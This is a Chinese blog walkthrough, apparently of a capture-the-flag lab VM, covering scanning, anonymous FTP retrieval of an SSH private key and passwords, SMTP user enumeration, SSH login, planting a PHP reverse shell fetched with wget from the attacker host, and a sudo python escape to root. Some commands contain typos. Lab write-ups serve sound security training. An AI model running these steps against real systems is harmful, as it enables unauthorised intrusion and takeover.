Rroken打靶渗透

一、信息收集

1、查看靶机的mac地址:

2、查看靶机的ip地址:

nmap 192.168.13.0/24

3、查看靶机开放的端口:

nmap 192.168.13.0/24

4、访问80端口是一个默认页面:

5、对其进行目录扫描:

dirsearch -u "192.168.13.148"

6、拼接访问,发现80端口几乎没有什么有价值的信息:

7、前面探测端口时发现有ftp服务开启,尝试连接,用户名随机:

ftp 192.168.13.148

8、连接失败,提示出一个唯一用户名:anonymous,使用这个用户名连接:

9、查看当前目录下的文件:

10、查看.ngircd目录里面的内容:

cd .ngircd

ls

get channels

cat channels

11、查看.ssh目录里面的内容:

cd ..

cd .ssh

get id_rsa

cat id_rsa

12、安装hexchat访问目标系统:

sudo apt-get update

apt install

13、输入目标系统IP地址,但是发现没有密码:

14、下载ngircd,查看默认密码:

密码:wealllikedebian

15、连接一下:

16、弹出需要加入频道,前面下载ftp里面内容有两个频道,第一个频道里面什么也没有,第二个频道里面有个密码:

密码为:mostmachineshaveasupersecurekeyandalongpassphrase

17、前面扫到有631端口,尝试访问:

18、点击Printers,发现一些名称,收集下来当作用户字典尝试爆破:

19、使用kali的msf模块进行扫描:

masfconsole

use auxiliary/scanner/smtp/smtp_enum

set rhosts 192.168.159.163

set user.txt

exploit

扫描到用户qiu和patrick

20、ssh使用密钥尝试登陆用户,最后patrick成功登陆:

ssh -i id_rsa patrick@192.168.13.148

二、提权

1、使用sudo -l查看用户sudo权限,发现只有关机的权限:

2、使用命令寻找可以执行的文件:

find / -perm 777 -type f 2>/dev/null

3、/etc/apache2/apache2.conf这个文件对所有用户有所有权限:

4、向这个文件中写入用户qiu:

5、在kali上面制作一个反弹shell文件:

locate php-reverse-shell.php

cp /usr/share/webshells/php/php-reverse-shell.php  /home/kali/Desktop/shell.php

vim shell.php

6、将文件放置在网站根目录下:

wget http://192.168.13.128:8000/shell.php

7、kali开启监听,重启靶机后访问shell.php:

Nc -lvvp 4444

8、查看反弹情况,成功反弹qiu用户:

9、查看sudo权限情况:

sudo -l

10、使用sudo进行提权:

sudo python -c 'import os; os.system("/bin/sh")'

  • 8
    点赞
  • 15
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值